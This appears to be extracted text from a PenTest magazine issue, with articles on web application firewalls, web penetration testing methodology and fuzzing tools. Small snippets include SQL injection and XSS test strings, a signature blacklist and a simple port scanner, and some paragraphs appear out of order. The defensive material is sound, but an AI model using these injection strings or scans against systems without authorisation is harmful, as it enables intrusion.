In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of, and more powerful, applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without the developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much knowledge they had.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies have in the meantime protected their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymity. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have recently started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standard later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALFs) or Application-Level Gateways (ALGs). In contrast with classic firewalls and Intrusion Detection
systems (IDS), a WAF checks the communication at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to have its security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
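The inverted-comma example can be illustrated with a small sketch (illustrative only, not a real WAF rule): a filter that strips quotes still passes a numeric-context injection untouched, which is exactly why character filtering alone gives a false sense of security.

```javascript
// The rule from the example: strip inverted commas out of the traffic.
function stripQuotes(value) {
  return value.replace(/['"]/g, '');
}

// A numeric-context injection needs no quotes at all, so this payload
// passes through the filter unchanged: character filtering alone is
// not a reliable defense against SQL Injection.
const payload = '1 OR 1=1';
```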
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in a different, predefined way. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can also be checked in this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, the valid characters and the permitted value range.
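Such a parameter rule might look like the following sketch; the rule set and function names are hypothetical, not a real WAF configuration:

```javascript
// Hypothetical per-form rule set: the expected parameters, each with
// a maximum length and an allowed-character pattern.
const formRule = {
  message: { maxLen: 256, pattern: /^[\w .,!?-]+$/ },
  lang:    { maxLen: 5,   pattern: /^[a-z-]+$/ },
};

// A request passes only if it introduces no unknown parameters and
// every value respects its length limit and character pattern.
function checkRequest(rule, params) {
  const names = Object.keys(params);
  if (names.length > Object.keys(rule).length) return false; // too many parameters
  return names.every(function (name) {
    const r = rule[name];
    return r !== undefined &&
           params[name].length <= r.maxLen &&
           r.pattern.test(params[name]);
  });
}
```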
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. However, in practice a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
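The combined model can be sketched roughly as follows; the URLs, patterns and signatures are illustrative only:

```javascript
// A learned whitelist covers a high-value sub-section strictly, while
// the rest of the site is screened against a templated blacklist of
// attack signatures.
const whitelistedParams = { '/order/new': /^[\w=&.-]+$/ };
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];

function allowRequest(url, payload) {
  const allowed = whitelistedParams[url];
  if (allowed) {
    return allowed.test(payload); // whitelist: only known-good input passes
  }
  return !blacklist.some((sig) => sig.test(payload)); // blacklist: known-bad is rejected
}
```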
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avert Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured in line with the respective requirements. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or their use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products, or, even better, a management center that administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation, namely in the online gambling industry
Cyber Security War
Available to download on December 22nd
WEB APP SECURITY
Page 14, http://pentestmag.com, 01/2011 (1) November
to address 100% of all the technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can be used to manipulate the logic of the application to do tasks that were never intended to be done. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows manual pen testing to subvert the business logic, exposing security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation that exists at point B.
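The A-to-C bypass is prevented server-side by tracking workflow state rather than trusting the order of client requests. A minimal sketch, with hypothetical names:

```javascript
// Hypothetical guard for the A -> B -> C flow: the server records the
// last completed step per session, so a request cannot jump from A
// straight to C and skip the validation check at B.
const flow = ['A', 'B', 'C'];

function advance(session, requestedStep) {
  const done = flow.indexOf(session.step); // -1 if nothing completed yet
  if (flow.indexOf(requestedStep) !== done + 1) {
    return false; // out-of-order request: rejected server-side
  }
  session.step = requestedStep;
  return true;
}
```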
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It is also proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database or the web server used by the application.
It's imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application, exposing the most likely exploitable vulnerabilities
Figure 1. The different activities of the pen testing process
and allowing similar instances of vulnerabilities to be found throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where access to the resources under test is gained remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process, such as Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment. Some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach the application security testing team does not have any inside information about the target environment, and the expected knowledge gain will be based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under testing is obtained before conducting the test.
• Source Code Analysis (White Box) – In this approach the penetration test team has full information about the application and its source code. In such a test the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It's also important to point out that penetration testing can be conducted as two different types of testing:

• External Penetration Testing
• Internal Penetration Testing

Both types of testing can be conducted with least information (black box) and also with full information (white box).
Figure 2. The different phases of pen testing
Figure 3 shows the different procedures and steps that can be used to conduct the penetration testing. The following are descriptions of these steps:
• Scope and Plan – In this step the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step the systems within the defined scope of the project are scanned: automated scanners examine open ports and probe the systems to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step the vulnerabilities are exploited using the automated tools: the attack methods designed in the previous phase are used to conduct the following tests: data & service pilferage, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings should also be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout the pen testing, a specific structured methodology has to be followed, where the following steps might be used: Enumeration, Vulnerability Assessment and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
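As a small illustration of that manual-inspection point, a few lines of Ruby (the language used elsewhere in this issue for Arachni) can pull the hidden form fields out of an HTML response, so the tester can review exactly what state the application trusts the client with. The helper name and the sample page are ours, for illustration only; a real assessment would use a proper HTML parser:

```ruby
# Extract hidden <input> fields from an HTML response body.
# A quick manual-inspection aid -- regex-based, not a full parser.
def hidden_fields(html)
  html.scan(/<input\b[^>]*type=["']hidden["'][^>]*>/i).map { |tag|
    name  = tag[/name=["']([^"']+)["']/i, 1]
    value = tag[/value=["']([^"']*)["']/i, 1]
    [name, value]
  }.to_h
end

page = '<form><input type="hidden" name="price" value="19.99">' \
       '<input type="text" name="qty"></form>'
hidden_fields(page)   # => {"price"=>"19.99"}
```

A hidden `price` field like the one above is a classic finding: if the server trusts it, a tester can tamper with the value via a proxy.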
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
Figure 3. Testing techniques, procedures and steps
• Authentication and Session Management (Session ID flaws) Vulnerabilities
• Cross Site Scripting (XSS) Vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause denial of service conditions, which are usually discussed beforehand. Possible options for denial of service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. At that point the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing:
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool examines or probes each of the designated network ports or services on the target system. Most of these tools can scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations, as well as to hide from network intrusion detection mechanisms.
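The core of the simplest technique, a TCP connect() scan, is only a few lines. This Ruby sketch is our own minimal example, not a substitute for a real scanner such as Nmap, which layers SYN/UDP scans, OS fingerprinting and IDS evasion on top of this idea:

```ruby
require 'socket'
require 'timeout'

# Minimal TCP connect() scan: a completed three-way handshake
# means the port is open; a refusal or timeout means it is not.
def open_ports(host, ports, timeout_s = 0.5)
  ports.select do |port|
    begin
      Timeout.timeout(timeout_s) { TCPSocket.new(host, port).close }
      true
    rescue StandardError
      false
    end
  end
end

open_ports('127.0.0.1', [80, 443, 8080])
```

Because each probe is an ordinary connect(), this scan is noisy and easily logged, which is exactly why real scanners offer stealthier modes.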
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their target systems. The main goal of a vulnerability scanner is to provide a means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help with web application-level penetration tests, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard and Core Impact.
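The heart of such a scanner is that defect database, keyed on what each service reveals about itself. A toy Ruby version of the lookup follows; the banner pattern, product name and advice string are made up for illustration and are not real vulnerability data:

```ruby
# Map service-banner patterns to checks; each check returns a
# finding string or nil. Real scanners ship thousands of these,
# curated from vendor advisories. 'ExampleHTTPd' is fictional.
KNOWN_DEFECTS = {
  /ExampleHTTPd\/1\.(\d+)/ => lambda { |m|
    m[1].to_i < 5 ? 'ExampleHTTPd < 1.5: known overflow, upgrade' : nil
  }
}

def findings_for(banner)
  KNOWN_DEFECTS.map { |re, check|
    (m = banner.match(re)) && check.call(m)
  }.compact
end

findings_for('Server: ExampleHTTPd/1.3')
# => ["ExampleHTTPd < 1.5: known overflow, upgrade"]
```

This also shows the scanners' main weakness: a patched-but-unchanged banner produces a false positive, and a hidden banner produces a false negative.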
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks for exercising the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields and other data used by the web application, and attempt to manipulate their values to trick the application.
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these practices; however, choosing the right tool for the job is vital to the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, to be used as a feedback and reporting feature for the test results.
• Extensibility – The tool can be customized, and it must provide scripting language or plug-in capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure flexibility in the implementation process.
• Documentation – The tool should provide documentation that gives a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that is flexible to use, without specific constraints such as a particular range of IP numbers or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookies, XML, etc.). If web developers fail to sanitize incoming data, it might lead to vulnerabilities such as SQL injection, cross site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – Cross Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from its own web form. It is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect any stored passwords.
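The first two techniques above each reduce to a few lines of code. This Ruby sketch uses only the standard library (CGI for HTML-escaping, SecureRandom for the token); the helper names are ours, and a production application would rely on its framework's equivalents rather than hand-rolled versions:

```ruby
require 'cgi'
require 'securerandom'

# 1. Never echo browser-supplied data raw: escape it so injected
#    markup is rendered as inert text instead of executing.
def safe_html(user_input)
  CGI.escapeHTML(user_input.to_s)
end

# 2. Anti-CSRF sketch: issue a random per-session token with each
#    served form, and reject any submission whose token mismatches.
def new_csrf_token
  SecureRandom.hex(32)
end

def form_accepted?(session_token, submitted_token)
  !session_token.nil? && submitted_token == session_token
end

safe_html('<script>alert(1)</script>')
# => "&lt;script&gt;alert(1)&lt;/script&gt;"
```

The token check works because an attacker's cross-site form cannot read the victim's session token and therefore cannot supply a matching value.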
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system; this process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes the whole vulnerability assessment process, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
Automated web application security tools have matured in recent years, and over time automated security assessment will continue to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools can't entirely replace manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, particularly for the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will go from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than manual human testing. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted at that scale.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements for a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases
When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation
All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: proprietary test scripts are not rewritten, even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: if the requirement for testers is simply to do fuzzing, they almost always choose the quick-and-dirty solution, which is almost always random fuzzing. Test requirements should focus on coverage metrics, to ensure that testing aims to find the most flaws in the software.
Using hardware test beds: appliance-based fuzzing tools become outdated very fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.
Unprepared for the cloud: a fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites
